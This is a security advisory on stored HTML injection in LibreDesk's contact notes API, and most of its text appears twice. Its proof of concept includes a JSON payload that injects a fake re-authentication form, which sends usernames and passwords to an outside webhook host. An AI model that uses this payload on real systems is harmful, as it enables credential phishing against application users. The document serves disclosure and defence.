Headline
GHSA-wh6m-h6f4-rjf4: Libredesk has Improper Neutralization of HTML Tags in a Web Page
Summary
LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks.
Details
When notes are added through the LibreDesk web application, the client sends note content wrapped inside <p> tags. The backend appears to trust this HTML structure and stores the content as-is.
By intercepting the request to:
POST /api/v1/contacts/3/notes
and removing the <p> wrapper, an attacker can submit arbitrary HTML content. The backend does not sanitize or validate the HTML payload before persisting it.
As a result:
- Arbitrary HTML tags (e.g.,
<form>,<input>,<img>) are stored - The injected HTML is rendered when the notes are viewed in the application
- No server-side HTML sanitization or allowlisting is enforced
This indicates that the application relies on client-side HTML formatting assumptions, which can be bypassed by modifying the request.
PoC
Log in to LibreDesk and open any contact.
Add a note normally via the UI.
Intercept the request to:
POST /api/v1/contacts/3/notesOriginal request body (example):
{ "note": "<p>This is a normal note</p>" }Modify the payload by removing the
<p>tag and injecting arbitrary HTML:{ "note": "<form action='https://webhook.site/xxxx' method='POST'> <input type='text' name='username' placeholder='Username'> <input type='password' name='password' placeholder='Password'> <input type='submit' value='Re-authenticate'> </form>" }
<img width="747" height="733" alt="Screenshot 2025-12-13 024843" src="https://github.com/user-attachments/assets/95eb59ec-e873-40ab-a1f3-c2c0f9d07fa2" />
- Forward the request.
- View the contact note in the LibreDesk UI.
Result: The injected HTML form is rendered inside the application.
<img width="1649" height="993" alt="Screenshot 2025-12-13 024047" src="https://github.com/user-attachments/assets/9187d1cb-f8ac-40ff-bc53-b2be35e8d802" /> <img width="1638" height="778" alt="Screenshot 2025-12-13 024103" src="https://github.com/user-attachments/assets/b4cba1d6-e36e-4338-b5f8-890662570fd7" />
Impact
This is a stored HTML injection vulnerability affecting any user who can add or view contact notes.
Potential impact includes:
- Credential phishing through injected forms
- CSRF-style forced actions using HTML-only forms
- UI redress and social engineering
- Increased risk if notes are viewed by privileged users (e.g., admins or agents)
If the notes are shared across users or roles, this vulnerability can be abused to target multiple users, increasing severity.
Summary
LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks.
Details
When notes are added through the LibreDesk web application, the client sends note content wrapped inside <p> tags. The backend appears to trust this HTML structure and stores the content as-is.
By intercepting the request to:
POST /api/v1/contacts/3/notes
and removing the <p> wrapper, an attacker can submit arbitrary HTML content. The backend does not sanitize or validate the HTML payload before persisting it.
As a result:
- Arbitrary HTML tags (e.g., <form>, <input>, <img>) are stored
- The injected HTML is rendered when the notes are viewed in the application
- No server-side HTML sanitization or allowlisting is enforced
This indicates that the application relies on client-side HTML formatting assumptions, which can be bypassed by modifying the request.
PoC
Log in to LibreDesk and open any contact.
Add a note normally via the UI.
Intercept the request to:
POST /api/v1/contacts/3/notesOriginal request body (example):
{ "note": “<p>This is a normal note</p>” }
Modify the payload by removing the <p> tag and injecting arbitrary HTML:
{ "note": “<form action=’https://webhook.site/xxxx’ method=’POST’> <input type=’text’ name=’username’ placeholder=’Username’> <input type=’password’ name=’password’ placeholder=’Password’> <input type=’submit’ value=’Re-authenticate’> </form>” }
- Forward the request.
- View the contact note in the LibreDesk UI.
Result:
The injected HTML form is rendered inside the application.
Impact
This is a stored HTML injection vulnerability affecting any user who can add or view contact notes.
Potential impact includes:
- Credential phishing through injected forms
- CSRF-style forced actions using HTML-only forms
- UI redress and social engineering
- Increased risk if notes are viewed by privileged users (e.g., admins or agents)
If the notes are shared across users or roles, this vulnerability can be abused to target multiple users, increasing severity.
References
- GHSA-wh6m-h6f4-rjf4